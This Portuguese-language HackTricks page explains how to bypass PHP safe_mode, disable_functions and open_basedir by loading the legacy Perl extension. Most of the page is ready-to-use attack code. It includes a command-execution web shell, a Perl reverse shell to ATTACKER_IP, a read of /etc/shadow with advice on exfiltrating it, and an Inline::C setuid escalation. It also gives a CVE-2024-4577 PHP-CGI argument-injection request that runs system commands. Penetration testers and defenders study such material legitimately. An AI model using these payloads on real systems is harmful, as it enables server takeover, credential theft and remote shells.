PHP Perl Extension Safe_mode Bypass Exploit

Tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporte o HackTricks

Contexto

O problema rastreado como CVE-2007-4596 vem da extensão PHP legada perl, que incorpora um interpretador Perl completo sem respeitar os controles PHP safe_mode, disable_functions ou open_basedir. Qualquer worker PHP que carregue extension=perl.so obtém eval Perl sem restrições, de modo que a execução de comandos permanece trivial mesmo quando todas as primitivas clássicas de criação de processos do PHP estão bloqueadas. Embora o safe_mode tenha desaparecido no PHP 5.4, muitas stacks de hospedagem compartilhada desatualizadas e labs vulneráveis ainda o incluem, então esse bypass ainda é útil quando você cai em painéis de controle legados.

Compatibilidade & Estado de Empacotamento (2025)

  • A última release do PECL (perl-1.0.1, 2013) mira PHP ≥5.0; PHP 8+ geralmente falha porque as APIs Zend mudaram.
  • PECL está sendo substituído por PIE, mas stacks mais antigos ainda distribuem PECL/pear. Use o fluxo abaixo em alvos PHP 5/7; em PHP mais recentes espere ter que fazer downgrade ou mudar para outro caminho de injeção (por exemplo, userland FFI).

Montando um Ambiente Testável em 2025

  • Recupere perl-1.0.1 do PECL, compile para a branch do PHP que você planeja atacar, e carregue globalmente (php.ini) ou via dl() (se permitido).
  • Receita rápida baseada em Debian:
sudo apt install php5.6 php5.6-dev php-pear build-essential
sudo pecl install perl-1.0.1
echo "extension=perl.so" | sudo tee /etc/php/5.6/mods-available/perl.ini
sudo phpenmod perl && sudo systemctl restart apache2
  • Durante a exploração, confirme a disponibilidade com var_dump(extension_loaded('perl')); ou print_r(get_loaded_extensions());. Se ausente, procure por perl.so ou abuse entradas graváveis em php.ini/.user.ini para forçar o carregamento.
  • Como o interpretador vive dentro do worker PHP, nenhum binário externo é necessário — filtros de egress de rede ou listas negras de proc_open não importam.

Cadeia de build no host quando phpize estiver acessível

Se phpize e build-essential estiverem presentes no host comprometido, você pode compilar e colocar perl.so sem invocar o shell do SO:

# grab the tarball from PECL
wget https://pecl.php.net/get/perl-1.0.1.tgz
tar xvf perl-1.0.1.tgz && cd perl-1.0.1
phpize
./configure --with-perl=/usr/bin/perl --with-php-config=$(php -r 'echo PHP_BINARY;')-config
make -j$(nproc)
cp modules/perl.so /tmp/perl.so
# then load with a .user.ini in the webroot if main php.ini is read-only
echo "extension=/tmp/perl.so" > /var/www/html/.user.ini

Se open_basedir estiver aplicado, certifique-se de que o .user.ini e o .so colocados residam em um caminho permitido; a diretiva extension= ainda é respeitada dentro do basedir. O fluxo de compilação espelha o manual do PHP para construir extensões PECL.

Original PoC (NetJackal)

From http://blog.safebuff.com/2016/05/06/disable-functions-bypass/, ainda útil para confirmar que a extensão responde a eval:

<?php
if(!extension_loaded('perl'))die('perl extension is not loaded');
if(!isset($_GET))$_GET=&$HTTP_GET_VARS;
if(empty($_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls';
$perl=new perl();
echo "<textarea rows='25' cols='75'>";
$perl->eval("system('".$_GET['cmd']."')");
echo "&lt;/textarea&gt;";
$_GET['cmd']=htmlspecialchars($_GET['cmd']);
echo "<br><form>CMD: <input type=text name=cmd value='".$_GET['cmd']."' size=25></form>";
?>

Melhorias Modernas de Payload

1. TTY completo sobre TCP

O interpretador embutido pode carregar IO::Socket mesmo se /usr/bin/perl estiver bloqueado:

$perl = new perl();
$payload = <<<'PL'
use IO::Socket::INET;
my $c = IO::Socket::INET->new(PeerHost=>'ATTACKER_IP',PeerPort=>4444,Proto=>'tcp');
open STDIN,  '<&', $c;
open STDOUT, '>&', $c;
open STDERR, '>&', $c;
exec('/bin/sh -i');
PL;
$perl->eval($payload);

2. Escape do sistema de arquivos mesmo com open_basedir

Perl ignora o open_basedir do PHP, então você pode ler arquivos arbitrários:

$perl = new perl();
$perl->eval('open(F,"/etc/shadow") || die $!; print while <F>; close F;');

Encaminhe a saída através de IO::Socket::INET ou Net::HTTP para exfiltrar dados sem tocar nos descritores gerenciados pelo PHP.

3. Inline Compilation for Privilege Escalation

Se Inline::C existir no sistema, compile auxiliares dentro da requisição sem depender do ffi ou pcntl do PHP:

$perl = new perl();
$perl->eval(<<<'PL'
use Inline C => 'DATA';
print escalate();
__DATA__
__C__
char* escalate(){ setuid(0); system("/bin/bash -c 'id; cat /root/flag'"); return ""; }
PL
);

4. Living-off-the-Land Enumeration

Trate Perl como um toolkit LOLBAS — por exemplo, dump MySQL DSNs mesmo se mysqli estiver ausente:

$perl = new perl();
$perl->eval('use DBI; @dbs = DBI->data_sources("mysql"); print join("\n", @dbs);');

2024+ Abuso: Loading perl.so via PHP-CGI Argument Injection (CVE-2024-4577)

Em instalações Windows que ainda expõem PHP-CGI, a regressão de 2024 argument-injection (CVE-2024-4577) permite que você passe opções arbitrárias -d para o interpretador. Isso significa que você pode carregar a extensão Perl mesmo quando dl() está desabilitada e o php.ini é somente leitura:

  • Compile ou envie um perl.dll/perl.so compatível para um caminho gravável pelo web (por exemplo, C:\xampp\htdocs\temp\perl.dll).
  • Envie uma única requisição HTTP que injete -d extension=C:\\xampp\\htdocs\\temp\\perl.dll e, no mesmo corpo da requisição, um payload em Perl:
POST /?%ADd+extension=C:\\xampp\\htdocs\\temp\\perl.dll+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: victim
Content-Type: application/x-www-form-urlencoded
Content-Length: 120

<?php $p=new perl(); $p->eval("system('whoami && hostname')"); ?>

Porque o worker do PHP agora incorpora Perl antes de ler o corpo, todos os controles clássicos disable_functions/open_basedir são contornados. Isso funciona em stacks vulneráveis Windows/CGI até ser corrigido (PHP 8.1.29/8.2.20/8.3.8 e posteriores fecham a regressão). Se open_basedir bloquear o caminho do DLL, coloque o arquivo primeiro dentro do diretório base permitido ou aproveite um caminho de DLL já existente legível por todos fornecido pelo XAMPP.

Referências

Tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporte o HackTricks